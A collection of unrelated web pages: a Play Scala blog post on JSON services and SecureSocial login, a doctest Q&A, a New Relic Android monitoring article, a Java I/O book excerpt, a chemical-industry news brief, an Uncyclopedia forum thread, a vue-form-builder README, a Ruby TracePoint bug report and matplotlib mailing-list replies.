Secure JSON Services with Play Scala and SecureSocial Last November, I traveled to Antwerp to speak at Devoxx. After my talk on HTML5 with Play Scala, Mattias Karlsson approached me and we had a chat about doing the same talk at Jfokus in Stockholm. I agreed and we began talking details after Trish and I returned to the US. I wrote this article on a plane between Denver and Seattle and will be hopping over the North Pole to Stockholm via Iceland tonight. For the past couple of weeks, I've been updating my Play More! HTML5/mobile app to add some new features. Most notably, I wanted to upgrade to Play 2.0, create JSON services and add authentication. Upgrading to Play 2.0 My attempt to upgrade to Play 2.0 involved checking out the source from GitHub, building and installing the RC1 snapshot. As I tried to upgrade my app and started getting failed imports, I turned to the internet (specifically StackOverflow) to see if it was a good idea. The first answer for that question suggested I stay with 1.x. If it's a critical project, to be finished before next March 2012, I would go with Play 1.x. If it's a less important project, which could be delayed, and that in any case won't be released before March 2012, try Play 2.0. While I didn't plan on releasing Play More! before Jfokus, I decided upgrading didn't add a whole lot to the talk. Also, I couldn't find a Play Scala 0.9.1 to Play 2.0 upgrade guide and I didn't have enough time to create one. So I decided to stick with Play 1.2.4 and add some JSON services for my iPhone client. JSON Servers I found Manuel Bernhardt's Play! Scala and JSON. This led me to Jerkson, built by the now infamous @coda. 
I was able to easily get things working fairly quickly and wrote the following WorkoutService.scala: package controllers.api import play.mvc.Controller import models._ import com.codahale.jerkson.Json._ object WorkoutService extends Controller { def workouts = { response.setContentTypeIfNotSet("application/json") generate(Workout.find().list()) } def edit(id: Long) = { generate(Workout.byIdWithAthleteAndComments(id)) } def create() = { var workout = params.get("workout", classOf[Workout]) Workout.create(workout) } def save(id: Option[Long]) = { var workout = params.get("workout", classOf[Workout]) Workout.update(workout) } def delete(id: Long) = { Workout.delete("id={id}").on("id" -> id).executeUpdate() } } Next, I added routes for my new API to conf/routes: GET /api/workouts api.WorkoutService.workouts GET /api/workout/{id} api.WorkoutService.edit POST /api/workout api.WorkoutService.create PUT /api/workout/{id} api.WorkoutService.save DELETE /api/workout/{id} api.WorkoutService.delete Then I created an ApiTest.scala class that verifies the first method works as expected. import play.test.FunctionalTest import play.test.FunctionalTest._ import org.junit._ class ApiTests extends FunctionalTest { @Test def testGetWorkouts() { var response = GET("/api/workouts"); assertStatus(200, response); assertContentType("application/json", response) println(response.out) } } I ran "play test", opened my browser to and clicked ApiTests -> Start to verify it worked. All the green made me happy. Finally, I wrote some CoffeeScript and jQuery to allow users to delete workouts and make sure delete functionality worked. $('#delete').click -> $.ajax type: 'POST' url: $(this).attr('rel') error: -> alert('Delete failed, please try again.') success: (data) -> location.href = "/more" I was very impressed with how easy Play made it to create JSON services and I smiled as my CoffeeScript skills got a refresher. 
The Friday before we left for Devoxx, I saw the module registration request for SecureSocial. SecureSocial allows you to add an authentication UI to your app that works with services based on OAuth1, OAuth2, OpenID and OpenID+OAuth hybrid protocols. It also provides a Username and Password mechanism for users that do not wish to use existing accounts in other networks. The following services are supported in this release: - Twitter (OAuth1) - Facebook (OAuth2) - Google (OpenID + OAuth Hybrid) - Yahoo (OpenID + OAuth Hybrid) - LinkedIn (OAuth1) - Foursquare (OAuth2) - MyOpenID (OpenID) - Wordpress (OpenID) - Username and Password In other words, it sounded like a dream come true and I resolved to try it once I found the time. That time found me last Monday evening and I sent a direct message to @jaliss (the module's author) via Twitter. Does Secure Social work with Play Scala? I'd like to use it in my Play More! project. Jorge responded 16 minutes later saying that he hadn't used Play Scala and he'd need to do some research. At 8 o'clock that night (1.5 hours after my original DM), Jorge had a sample working and emailed it to me. 10 minutes later I was adding a Secure trait to my project. package controllers import play.mvc._ import controllers.securesocial.SecureSocial /* * @author Jorge Aliss <jaliss@gmail.com> of Secure Social fame. */ trait Secure { self: Controller => @Before def checkAccess() { SecureSocial.DeadboltHelper.beforeRoleCheck() } def currentUser = { SecureSocial.getCurrentUser } } I configured Twitter and Username + Password as my providers by adding the following to conf/application.conf. securesocial.providers=twitter,userpass I also had to configure a number of securesocial.twitter.* properties. Next, I made sure my routes were aware of SecureSocial by adding the following to the top of conf/routes: * /auth module:securesocial Then I specified it as a dependency in conf/dependencies.yml and ran "play deps". 
- play -> securesocial 0.2.4 After adding "with Secure" to my Profile.scala controller, I tried to access its route and was prompted to login. Right off the bat, I was shown an error about a missing jQuery 1.5.2 file in my "javascripts" folder, so I added it and rejoiced when I was presented with a login screen. I had to add the app on Twitter to use its OAuth servers, but I was pumped when both username/password authentication worked (complete with signup!) as well as Twitter. The only issue I ran into with SecureSocial was that it didn't find the default implementation of SecureSocial's UserService.Service when running in prod mode. I was able to workaround this by adding a SecureService.scala implementation to my project and coding it to talk to my Athlete model. I didn't bother to hook in creating a new user when they logged in from Twitter, but that's something I'll want to do in the future. I was also pleased to find out customizing SecureSocial's views was a breeze. I simply copied them from the module into my app's views and voila! 
package services import play.db.anorm.NotAssigned import play.libs.Codec import collection.mutable.{SynchronizedMap, HashMap} import models.Athlete import securesocial.provider.{ProviderType, UserService, SocialUser, UserId} class SecureService extends UserService.Service { val activations = new HashMap[String, SocialUser] with SynchronizedMap[String, SocialUser] def find(userId: UserId): SocialUser = { val user = Athlete.find("email={email}").on("email" -> userId.id).first() user match { case Some(user) => { val socialUser = new SocialUser socialUser.id = userId socialUser.displayName = user.firstName socialUser.email = user.email socialUser.isEmailVerified = true socialUser.password = user.password socialUser } case None => { if (!userId.provider.eq(ProviderType.userpass)) { var socialUser = new SocialUser socialUser.id = userId socialUser } else { null } } } } def save(user: SocialUser) { if (find(user.id) == null) { val firstName = user.displayName val lastName = user.displayName Athlete.create(Athlete(NotAssigned, user.email, user.password, firstName, lastName)) } } def createActivation(user: SocialUser): String = { val uuid: String = Codec.UUID() activations.put(uuid, user) uuid } def activate(uuid: String): Boolean = { val user: SocialUser = activations.get(uuid).asInstanceOf[SocialUser] var result = false if (user != null) { user.isEmailVerified = true save(user) activations.remove(uuid) result = true } result } def deletePendingActivations() { activations.clear() } } Jorge was a great help in getting my authentication needs met and he even wrote a BasicAuth.scala trait to implement Basic Authentication on my JSON services. package controllers import _root_.securesocial.provider.{UserService, ProviderType, UserId} import play._ import play.mvc._ import play.libs.Crypto import controllers.securesocial.SecureSocial /* * @author Jorge Aliss <jaliss@gmail.com> of Secure Social fame. 
*/ trait BasicAuth { self: Controller => @Before def checkAccess = { if (currentUser != null) { // this allows SecureSocial.getCurrentUser() to work. renderArgs.put("user", currentUser) Continue } val realm = Play.configuration.getProperty("securesocial.basicAuth.realm", "Unauthorized") if (request.user == null || request.password == null) { Unauthorized(realm) } else { val userId = new UserId userId.id = request.user userId.provider = ProviderType.userpass val user = UserService.find(userId) if (user == null || !Crypto.passwordHash(request.password).equals(user.password)) { Unauthorized(realm) } else { // this allows SecureSocial.getCurrentUser() to work. renderArgs.put("user", user) Continue } } } def currentUser = { SecureSocial.getCurrentUser() } } Summary My latest pass at developing with Scala and leveraging Play to build my app was a lot of fun. While there were issues with class reloading every-so-often and Scala versions with Scalate, I was able to add the features I wanted. I wasn't able to upgrade to Play 2.0, but I didn't try that hard and figured it's best to wait until its upgrade guide has been published. I'm excited to describe my latest experience to the developers at Jfokus this week. In addition, the conference has talks on Play 2.0, CoffeeScript, HTML5, Scala and Scalate. I hope to attend many of these and learn some new tricks to improve my skills and my app. Update: The Delving developers have written an article on Migration to Play 2. While it doesn't provide specific details on what they needed to change, it does have good information on how long it took and things to watch for.
http://java.dzone.com/articles/secure-json-services-play
Hypothetically speaking, my function returns a value and has a lot of print statements (maybe 100 or more). Is there a way to run doctest so that only the return value is checked and the print calls are ignored - short of marking everything with # doctest: +SKIP - whether the tests are run via python mymodule.py, python -m doctest mymodule.py, or through unittest? doctest uses stdout, not stderr, to show messages from any failing tests. Therefore you cannot patch out stdout as this answer originally suggested - this will suppress your doctest. One option is to define functions that take a verbose parameter, so that you can suppress the printing when necessary. def foo(verbose=True): """Does whatever. >>> foo(verbose=False) """ if verbose: print('Hello world') Although you have to change the functions, this also gives you useful options when not testing. Another is to explicitly supply the appropriate print function: def bar(print=print): """Does whatever. >>> bar(print=lambda *args, **kwargs: None) """ print('Hello world') This also requires changes to function definitions, but at least avoids changes in the bodies of those functions. A third option is to patch out print when running the tests: def baz(): """Does whatever. >>> baz() """ print('Hello world') if __name__ == '__main__': import doctest print = lambda *args, **kwargs: None doctest.testmod() Note that this affects the outputs that doctest sees, too, so you can't include any of the printed output in your doctests. This won't work with python -m doctest mymodule.py, though.
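A runnable sketch of the first approach above (the verbose parameter), with the docstring example checked programmatically so you can see it pass without relying on module-level testmod():

```python
import doctest

def foo(verbose=True):
    """Return a value, optionally printing progress chatter.

    >>> foo(verbose=False)
    42
    """
    if verbose:
        print('Hello world')  # suppressed when the doctest calls foo
    return 42

# Collect and run just foo's docstring examples. Passing module=False
# and explicit globs avoids any dependence on how this file is loaded.
finder = doctest.DocTestFinder()
runner = doctest.DocTestRunner()
for test in finder.find(foo, "foo", module=False, globs={"foo": foo}):
    runner.run(test)
print(runner.failures)  # 0 - the example's output matches
```

Because the docstring calls foo(verbose=False), the expected output is just the return value, and the hundred print statements never pollute the test.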
https://codedump.io/share/S5PYiQoLLhXt/1/is-there-way-to-only-perform-the-doctests-ignoring-print-function-calls
Monitoring mobile apps should be easy, all you need to do is arrange to send the data back to a server - but what server? There is enough to do without having to implement a complete monitoring system as well. The easiest option is to use someone else's server and that's what I did with my latest complicated app that involved interaction with a web site. As I needed something that could monitor a web server and an Android app I continued my exploration of the New Relic analytics and monitoring as a service system. To start off though I tried the solution out on a simple small Android app to see how it all worked. The biggest worry is that adding someone else's monitor code to your code is going to make a mess of your app. However, the New Relic instrumentation is particularly unobtrusive and easy to use. If the key test is always how easy it is to remove, the good news in this case is that it is trivial. The exact nature of getting everything set up depends on whether you are using Android or iOS, and with Android what development system you are using. The fine detail may differ but the general procedure is more or less the same. I used Android Studio and added the requisite code via Gradle. If you are new to Android Studio, and Gradle in particular, this can seem a bit scary, but in practice it is a huge simplification. If you are expecting to have to manually download a library and install it then forget it because Gradle does it all for you. All you have to do is provide the name of your app and add some lines to the build.Gradle file that you will find in the app directory. Add the lines listed in the setup instruction to the end of the file. Next you need to provide INTERNET and ACCESS_NETWORK_STATE permission to the AndroidManifest.xml file in the src directory. You can add the two lines needed just after the <manifest> tag. Of course, if the app already has these permissions you don't need to add them at all. 
Finally we get to the modification you need to make to the source code. This is the surprising part. All you need to do is add:

```java
import com.newrelic.agent.android.NewRelic;
```

and:

```java
NewRelic.withApplicationToken("app token")
        .start(this.getApplication());
```

These lines start the monitoring and need to be placed in your app's onCreate method. That's it! If you need to undo the changes, you have a single line of code and an import statement to remove.

There is only one possible mistake you could make. The "app token" that you have to enter isn't the License key that was generated when you signed up to a New Relic account. Each app that you want to monitor has a different application token, which is generated when you enter the name of the app. If you use the instructions that are provided to "Add a new app", then the generated app token is shown in the instructions and all you have to do is copy and paste. If you clean the project and rebuild it then, as long as you have the correct app token, you will see data being collected in a few minutes. You don't have to use a real Android device; the monitoring code works with the emulator as long as there is Internet access. After adding the code to your app you can start seeing the data flow into the monitoring dashboard. Even if you have used the same New Relic technology on a web site, it comes as something of a shock to discover that you get to see the data from all of the people using your app at that moment. This may seem obvious, but if you are testing things out you will only see your single instrumented test instance - remember that when you go live all of your users contribute data. The Dashboard shows the status of all of the apps you have instrumented, and there is a traffic light indicator that shows the health of your app. This is mainly a function of how well it is communicating with the Internet and your backend server.
It helps to remember, when you are trying things out using a simulator, that this dribble of information grows when you do the same thing for real! You can select any of your apps from the dashboard to display more detail. The overview shows you how much time is being taken by different operations within your app. This is an average for all of the active sessions, so what it is actually showing you is a snapshot of your app's actual activity at any given time. The instrumentation tracks anything that the user does to interact with your app - starting it up, posting a photo, updating a profile, etc. You get individual data for each interaction. If you drill down you can see thread type, class and method name, percent of execution time, average number of calls per interaction and overall average execution time. You can select various parameters to narrow down the data displayed - date, app version and specific operations within your app. You can also see which are the slowest operations; notice that this is again an average across all of the active sessions, so you are seeing the effects of running the app on different hardware. It is a bit like having a profiler running on a large set of machines at the same time. It is also easy to get the status of the device that the app is running on. You can see how much memory, CPU and database your app is using on the device. As well as getting performance data, you can also gather some data that might be useful in marketing and in guiding future improvements to your app. You can easily find out the distribution of device types and which versions of the OS are faster than others. You can even get monthly uniques to show how successful your app actually is.
http://www.i-programmer.info/projects/31-systems/7372-monitor-mobile.html
Because of the nature of filter streams, it is relatively straightforward to add decompression services to the FileDumper program last seen in Chapter 7. Generally, you'll want to decompress a file before dumping it. Adding decompression does not require a new dump filter. Instead, it simply requires passing the file through an inflater input stream before passing it to one of the dump filters. We'll let the user choose from either gzipped or deflated files with the command-line switches -gz and -deflate. When one of these switches is seen, the appropriate inflater input stream is selected; it is an error to select both. Example 9-15, FileDumper4, demonstrates.

Example 9-15. FileDumper4

```java
import java.io.*;
import java.util.zip.*;
import com.macfaq.io.*;

public class FileDumper4 {

  public static final int ASC = 0;
  public static final int DEC = 1;
  public static final int HEX = 2;
  public static final int SHORT = 3;
  public static final int INT = 4;
  public static final int LONG = 5;
  public static final int FLOAT = 6;
  public static final int DOUBLE = 7;

  public static void main(String[] args) {

    if (args.length < 1) {
      System.err.println("Usage: java FileDumper4 [-ahdsilfx] [-little]"
        + "[-gzip|-deflated] file1...");
    }

    boolean bigEndian = true;
    int firstFile = 0;
    int mode = ASC;
    boolean deflated = false;
    boolean gzipped = false;

    // Process command-line switches.
    for (firstFile = 0; firstFile < args.length; firstFile++) {
      if (!args[firstFile].startsWith("-")) break;
      if (args[firstFile].equals("-h")) ...
```
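The "wrap the stream in a decompressor before the dump filter sees it" idea is easy to demonstrate outside Java as well. The helper below is a hypothetical Python analogue (not part of the book's code), with the same rule that selecting both -gz and -deflate is an error:

```python
import gzip
import io
import zlib

def open_maybe_compressed(raw: bytes, gzipped: bool = False,
                          deflated: bool = False) -> io.BytesIO:
    """Mimic FileDumper4's -gz/-deflate switches: decompress the input
    before handing it to a dump filter.  Selecting both is an error,
    as in the Java version."""
    if gzipped and deflated:
        raise ValueError("choose at most one of -gz / -deflate")
    if gzipped:
        return io.BytesIO(gzip.decompress(raw))
    if deflated:
        return io.BytesIO(zlib.decompress(raw))
    return io.BytesIO(raw)

payload = b"bytes for the dump filters"
assert open_maybe_compressed(gzip.compress(payload), gzipped=True).read() == payload
assert open_maybe_compressed(zlib.compress(payload), deflated=True).read() == payload
```

Whatever comes back is a plain readable stream, so the downstream dump code never needs to know whether the input was compressed - the same design point the chapter makes about filter streams.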
https://www.oreilly.com/library/view/java-io/1565924851/ch09s06.html
31 July 2012 09:18 [Source: ICIS news] SINGAPORE (ICIS)--LG Chem is planning to conduct test-runs at its new phenol/acetone plant.

The plant, with a nameplate capacity of 300,000 tonnes/year of phenol and 180,000 tonnes/year of acetone, is still under construction, the source said, adding that the construction of the plant will be completed in September. No details were given on the start and the cost of the construction.

LG Chem is targeting commercial production at the new facility on 1 November, the source said.

The upcoming new capacity is expected to exert downward pressure on phenol and acetone prices, given weak demand amid a slowing
http://www.icis.com/Articles/2012/07/31/9582232/lg-chem-to-test-run-daesan-phenolacetone-plant-on-1.html
Forum: May 25th - Towel Day Reskin?
From Uncyclopedia, the content-free encyclopedia
On May 25th we'll celebrate "Towel Day" - in memory of Douglas Adams. How about a nice reskin in his memory? Could be quite simple, a picture of a towel and some text to go along, or just a huge 42 in the center of the screen. Any thoughts? ~ 12:03, 8 May 2007 (UTC)
- Here's one: The surest way of seeing a reskin made is by working on it yourself. :) —Major Sir Hinoa prepare for trouble • make it double? 12:05, 8 May 2007 (UTC)
- True, but considering the fact that I have no design/graphic ability whatsoever... 'tis a bit of a problem. I usually use the kind services of Modusoperandi dry humor designs inc.. 12:50, 8 May 2007 (UTC)
- Just about anything in memory of the great man would be worthwhile. RabbiTechno 12:06, 8 May 2007 (UTC)
I agree. TOWEL DAY RESKIN IS A MUST.... i'll do it if necessary so sayeth Sliferjam ~ Talk * Sock * Jam * Gallery * Fearless Fosdick? 21:07, 8 May 2007 (UTC)
- Both good, personally I prefer DNATater. RabbiTechno 16:48, 9 May 2007 (UTC)
- How about one with Marvin the Paranoid Android? Or was it Morally Depressed Android? --Lt. Sir Orion Blastar (talk) 18:16, 9 May 2007 (UTC)
How's this? 18:48, 9 May 2007 (UTC)
- Good but I like the Classic Marvin better. I heard the original Marvin suit got destroyed except for the head, and they had to create a new Marvin for the movie. I guess they went the Teletubby way when Disney produced the movie to appeal to kids, and took "Brain the size of a planet" too literally and gave him a big head. Good enough anyway, I like your version. --Lt. Sir Orion Blastar (talk) 20:43, 9 May 2007 (UTC)
Great idea. Much as I like all the attempts, I'm for DNATater. Perhaps the others could replace the logos in other namespaces or something.
--Nerd42eMailTalkUnMetaWPediah2g2 19:22, 9 May 2007 (UTC) Much as I'd love to pretend we're endorsed by DNA himself, I think that one's a bit too obvious - I vote for the GreenTater for the subtlety (only with added "Don't Panic" stolen from DNATater). Otherwise, just let it all out and call it "We're doing a tribute to Douglas Adams today" Day. --Whhhy?Whut?How? *Back from the dead* 19:44, 9 May 2007 (UTC) - Whatever logo gets picked, I hope towels are involved somewhere on the main page. "Uncyclopedia, the hoopy-frood encyclopedia that knows where its towel is." (It'd be an awful shame if someone goes to a lot of work on a reskin to tribute Douglas Adams on Towel Day without mentioning towels) -:29, 10 May 2007 (UTC) So, who is the admin to talk with? ~ 08:12, 10 May 2007 (UTC)
http://uncyclopedia.wikia.com/wiki/Forum:May_25th_-_Towel_Day_Reskin%3F
vue-form-builder

A simple form-builder with drag & drop to help you build your own forms. Less code in development, and your site will be more generic and configurable.

Advantages:
- Less code in development
- Wide range of APIs
- Easy to maintain and update later
- Easy to configure your form (drag & drop, control settings)
- Extensibility (extendable): helps you import your own controls
- Validation & custom control validation supported
- ...

Fully documented in this Repo's Wiki. Check it out!

Give this repo a ⭐ (star) if you actually like this and will use it for your development/production :D! Thank you!

The library is built & ready for production, but if you meet any bugs or issues, feel free to open one!

Demo Online:

Demo Project:

Current version

Current latest version of the Vue Form Builder: 1.4.0.

Updated/Features:
- Refactored most code; easier to read, develop & maintain now.
- Able to add more controls (extendable)
- Fix some minor bugs
- Updated devDependencies that had security problems.

Technologies/Libraries used
- Javascript
- VueJS 2.x
- Webpack
- JQuery/JQuery UI
- Bootstrap 4
- ...

Note: From version 1.2.0 onwards, the Bootstrap 4 stylesheet is not imported into the bundle; you should include your own Bootstrap 4 stylesheet in order to get both the GUI & Template working normally.

Form Builder Structure
- Template: where you can config/create/edit your own form.
- GUI: where the form will be built from your configuration.

For more information please visit this Repo's wiki, thanks :D!

How to install?

Run this command to install:

npm i v-form-builder --save

NPMJS:

Notes:
- For the best experience, please install the latest version!
- Please don't install old versions below v1.1.1. Thank you!

How to implement?
Import into your project

1/ Import as a global component

```javascript
import FormBuilder from 'v-form-builder';
Vue.component('FormBuilder', FormBuilder);
```

2/ Import as a single component

```javascript
import FormBuilder from 'v-form-builder';

export default {
  components: { FormBuilder },
  // ...
}
```

Note: you should have your own Bootstrap 4 stylesheet imported inside your project in order to use the Form Builder normally.

Usage

```html
<template>
  <div>
    <!-- form builder template -->
    <form-builder type="template" v-model="formConfiguration"></form-builder>

    <!-- form builder gui -->
    <form-builder type="gui" :form="formConfiguration"></form-builder>
  </div>
</template>
```

Binding options:
- type (String):
  - Form Config (Template): template
  - Form GUI: gui
- form (Object) - for the Form GUI only; you pass the configuration data here and the Form Builder will build the form from it.

V-Model for Form Builder Template

You can use v-model with the Form Builder Template. It returns the form configuration data that you have configured (an object), and it also renders an old configuration and lets you edit/update it.

```html
<template>
  <div>
    <form-builder type="template" v-model="formConfiguration"></form-builder>
  </div>
</template>
```

The form config data would look like this:

```javascript
{
  sections: [...],
  layout: "...",
  _uniqueId: "..."
}
```

Ideally, you need to convert that object to a JSON string and then save it in your database :D

V-Model for Form Builder GUI

You can use v-model to get/set values from your built form.

```html
<template>
  <div>
    <form-builder type="gui" :form="formConfiguration" v-model="formValues"></form-builder>
  </div>
</template>
```

The form values data would look like this:

```javascript
{
  section_key: {
    control_name_1: "data",
    control_name_2: 123,
    ...
  },
  ...
}
```

APIs

Please visit this Repo's Wiki.

Release notes
- Version 1.4.0:
  - Refactored; the code is easier to view & read.
  - Able to extend with a custom control.
  - Fix some minor bugs.
- Version 1.3.0:
  - Milestone 3 released.
  - Able to validate the form.
  - Able to style the label (bold, italic, underline).
  - Able to set the control label position for a Section (horizontal or vertical)
  - Fix some bugs
  - Constraints for some Hooks
  - APIs for validation
- Version 1.2.1:
  - Fix some minor bugs.
- Version 1.2.0:
  - Hooks are available now for both Template & GUI.
  - More options for controls, like:
    - Select: Ajax data source (URL)
    - Date Picker: date format
    - Time Picker: time format
  - Updated controls:
    - Number Control works properly with decimal places.
    - Time Picker: changed to another time picker with better APIs + options.
  - Fix a problem that prevented the Date Picker icon from showing.
  - Stop importing Bootstrap 4 CSS into the bundle.
- Version 1.1.1:
  - First release of Vue Form Builder
  - Able to config a form & render a form from config data.
  - Get/set values for both GUI & Template.

Supporting the project

If you really like this project & want to contribute a little to the development, you can buy me a coffee. Thank you very much for your support <3.
https://codespots.com/library/item/1234
Bug #14889 TracePoint for :line never seems to trigger on argument list. Maybe by design? Description I have the following code. 30 1| def print_summary( 31 0| output = $stdout 32 | ) In the margin is the line number followed by the number of hits according to :line trace point. I feel like line 31 should also trigger a line trace point. It's an argument, but it must be executed. Maybe a different trace point? :argument? History Updated by ioquatix (Samuel Williams) about 1 year ago If this is by design, please feel free to close, but as it stands there is no way to check if optional argument evaluation occurred or not. For code coverage, this is a limitation. Updated by mame (Yusuke Endoh) about 1 year ago I'm unsure about your assumption. If you can insert a newline freely, you may want to write the following code: 30 1| def print_summary( 31 | output = ( 32 0| $stdout 33 | ) 34 | ) You can hook Line 32 as a :line event. We usually write an optional argument in a line: def print_summary(out = $stdout). I don't think it is a good idea to deal with such a code as a :line event because for def foo(x = 1, y = 2) we cannot distinguish x event and y event. As you say, if we really need this, we should add a new event type like :argument, but we need to design its API carefully based on actual use cases. Updated by shevegen (Robert A. Heiler) about 1 year ago I don't have anything overly helpful to the discussion to add; but I wanted to add one thing to this: We usually write an optional argument in a line: def print_summary(out = $stdout) While I concur in general, I myself have experimented a little with layout such as: def foo( a = 'foo', b = 'bar', ) The reason was primarily because it is, for my bad eyesight, easier to assess which arguments are used; I only have to look at the left hand side mostly. Makes it easier for me to keep track what is going on. 
This may be a rare layout perhaps, but coming from this, I understand where Samuel is coming from (but this is not me saying anything pro or con on the suggestion itself; I really only wanted to comment on spaced-out optional arguments). On a side note that may not be very relevant either, one can add strings to ')' such as: def foo( i = 'bar' )"hello world!" puts i end foo :-) I don't even know if that is a bug or a feature or something totally irrelevant. I just found it funny and golfing-worthy (even though I am a horrible code golfer). Almost a bit like python doc strings! :D Also available in: Atom PDF
https://bugs.ruby-lang.org/issues/14889
>>>>> "John" == John Kitchin <jkitchin@...> writes: John> Could these kinds of things be done in/with matplotlib? Or John> more importantly, does a framework in matplotlib exist that John> this kind of thing could be developed? I am interested in John> talking to anyone who has thoughts about this. Basically, you will want to read up on matplotlib event handling. Resources * user's guide section "event handling" in the pylab chapter * class documentation for Events at. * wiki entry at * Example escripts picker_demo.py poly_editor.py JDH John Hunter wrote: >>>>>>"Andrew" == Andrew Straw <strawman@...> writes: >>>>>> >>>>>> > > Andrew> So I modified nat.py in the following way, and it now > Andrew> works. And there was much rejoicing! > >Anyone want to volunteer for a wiki entry on this one? It comes up a >lot... > >JDH > > John: I was thinking about putting together a natgrid toolbox, which would provide a function similar to matlab's griddata. This would building a new python interface to the natgrid c lib, since LLNL's license is too restrictive. The natgrid lib itself is GPL, which I think precludes it from being included in matplotlib proper. What do you think? : >>>>> "Andrew" == Andrew Straw <strawman@...> writes: Andrew> So I modified nat.py in the following way, and it now Andrew> works. And there was much rejoicing! Anyone want to volunteer for a wiki entry on this one? It comes up a lot... JDH >>>>> "Samuel" =3D=3D Samuel GARCIA <sgarcia@...> writes: Samuel> I am new (futur) of pylab, I use a debian sid Samuel> (unstable) with this source.list : deb Samuel> [1] packages/ deb-src Samuel> [2] sources/ I try it Samuel> few 2 mouths ago and it worked, I have just updated all Samuel> and now it does nit worked. Sorry if the answer is in Samuel> archive, I did'nt find it. I have this message with from Samuel> pylab import * : This is a problem with your debian packaging system, and unfortunately is outside our ability to help. 
I would report this to Vittorio, the debian package maintainer. gtk recently started using cairo as its rendering engine, and it appears one of your package is linking to it but it is not provided, so it looks like a debian dependency error. JDH Samuel> -------------------------------------------------------------= --------- Samuel> ----- exceptions.ImportError Traceback (most recent call Samuel> last) /home/sgarcia/<console> Samuel> /usr/lib/python2.3/site-packages/pylab.py -3 from Samuel> matplotlib.pylab import * Samuel> /usr/lib/python2.3/site-packages/matplotlib/pylab.py 197 Samuel> 198 from axes import Axes, PolarAxes --> 199 import backends Samuel> 200 from cbook import flatten, is_string_like, Samuel> exception_to_str, popd, \ 201 silent_list, iterable, Samuel> enumerate Samuel> /usr/lib/python2.3/site-packages/matplotlib/backends/__init__= .py Samuel> 53 # a hack to keep old versions of ipython working with Samuel> mpl after bug 54 # fix #1209354 55 if 'IPython.Shell' in Samuel> sys.modules: ---> 56 new_figure_manager, draw_if_interactive, show =3D Samuel> pylab_setup() 57 Samuel> /usr/lib/python2.3/site-packages/matplotlib/backends/__init__= .py Samuel> in pylab_setup() 22 backend_name =3D Samuel> 'backend_'+backend.lower() 23 backend_mod =3D Samuel> __import__('matplotlib.backends.'+backend_name, ---> 24 Samuel> globals(),locals(),[backend_name]) 25 26 # Things we Samuel> pull in from all backends Samuel> /usr/lib/python2.3/site-packages/matplotlib/backends/backend_= gtkagg.py Samuel> 8 from matplotlib.figure import Figure 9 from backend_agg Samuel> import FigureCanvasAgg ---> 10 from backend_gtk import gtk, FigureManagerGTK, Samuel> FigureCanvasGTK,\ 11 show, draw_if_interactive,\ 12 Samuel> error_msg_gtk, NavigationToolbar, PIXELS_PER_INCH, Samuel> backend_version, \ Samuel> /usr/lib/python2.3/site-packages/matplotlib/backends/backend_= gtk.py Samuel> 20 from matplotlib.backend_bases import RendererBase, Samuel> GraphicsContextBase, \ 21 
FigureManagerBase, Samuel> FigureCanvasBase, NavigationToolbar2, cursors ---> 22 from matplotlib.backends.backend_gdk import RendererGDK, Samuel> FigureCanvasGDK 23 from matplotlib.cbook import Samuel> is_string_like, enumerate 24 from matplotlib.figure import Samuel> Figure Samuel> /usr/lib/python2.3/site-packages/matplotlib/backends/backend_= gdk.py Samuel> 32 from matplotlib.backends._na_backend_gdk import Samuel> pixbuf_get_pixels_array 33 else: ---> 34 from matplotlib.backends._nc_backend_gdk import Samuel> pixbuf_get_pixels_array 35 36 ImportError: Samuel> libpangocairo-1.0.so.0: Ne peut ouvrir le fichier d'objet Samuel> partag=E9: Aucun fichier ou r=E9pertoire de ce type Samuel -- Samuel> Samuel GARCIA CNRS - UMR5020 Universite Claude Bernard Samuel> LYON 1 Laboratoire des Neurosciences et Systemes Samuel> Sensoriels 50, avenue Tony Garnier 69366 LYON Cedex 07 04 Samuel> 37 28 74 64 Samuel> ------------------------------------------------------- Samuel> This SF.Net email is sponsored by: Power Architecture Samuel> Resource Center: Free content, downloads, discussions, and Samuel> more. Samuel> _______________________________________________ Samuel> Matplotlib-users mailing list Samuel> Matplotlib-users@... Samuel> Samuel> References Samuel> 1. Samuel> 2. Your error occurs much more recently than the glyph one that occupies your subject Python 2.3.4 (#1, Feb 2 2005, 12:11:53) [GCC 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> from pylab import * >>> from data_helper import get_daily_data Traceback (most recent call last): File "<stdin>", line 1, in ? ImportError: No module named data_helper It looks like you have not downloaded the data_helper module from the web site, that this example uses. You'll also need to download the data files as well ... 
>>> grid(True) >>> >>> show() Traceback (most recent call last): File "/usr/lib/python2.3/site-packages/matplotlib/backends/backend_gtk.py", line 318, in expose_event You should not use show from interactive mode. Try reading and JDH >>>>> "Willi" == Willi Richert <w.richert@...> writes: >>>>> "Willi" =3D=3D Willi Richert <w.richert@...> writes: Willi> Hi, Willi> #!/usr/bin/python Willi> from scipy import * from pylab import * Willi> MAX_TIME =3D 7000 Willi> fn_social=3D"all-avg.dat" Willi> def readStats(fn): q =3D [d for d in io.read_array(fn) if Willi> d[0]<=3DMAX_TIME] Willi> print q t=3D[s[0] for s in q] Willi> age=3D[s[1] for s in q] age_conf=3D[s[2] for s in q] Willi> wp=3D[s[3] for s in q] wp_conf=3D[s[4] for s in q] Willi> return t, age, age_conf, wp, wp_conf Willi> hold(True) Willi> t, age, age_conf, wp, wp_conf =3D readStats(fn_social) Willi> xlabel('time [s]') ylabel('average lifetime [s]') Willi> errorbar(t,wp,yerr=3Dwp_conf, color=3D"blue",ecolor=3D"black", Willi> mfc=3D'red', mec=3D'green', ms=3D200, mew=3D4) Willi> show() Willi> Am Freitag, 14. Oktober 2005 16:05 schrieb John Hunter: >> >>>>> "Willi" =3D=3D Willi Richert <richert@...> writes: >>=20 Willi> Thanks, that helped! Switching to QtAgg did the trick. Willi> However, I have still some issues: 1) the text placement of Willi> the titles does not really work: Willi> >> Willi> 2) The confidence intervals are only vertical lines. I Willi> would like to have some small horizontal "stoppers" at the Willi> upper and lower point of those error bars. Is that Willi> possible with matplotlib? >>=20 >>=20 >> Could you post the script -- hard to debug in a vacuum. >>=20 >> JDH >>=20 >>=20 >> ------------------------------------------------------- This >> SF.Net email is sponsored by: Power Architecture Resource >> Center: Free content, downloads, discussions, and >> more. >> _______________________________________________ >> Matplotlib-users mailing list >> Matplotlib-users@... >> Willi> -- Dipl.-Inform. 
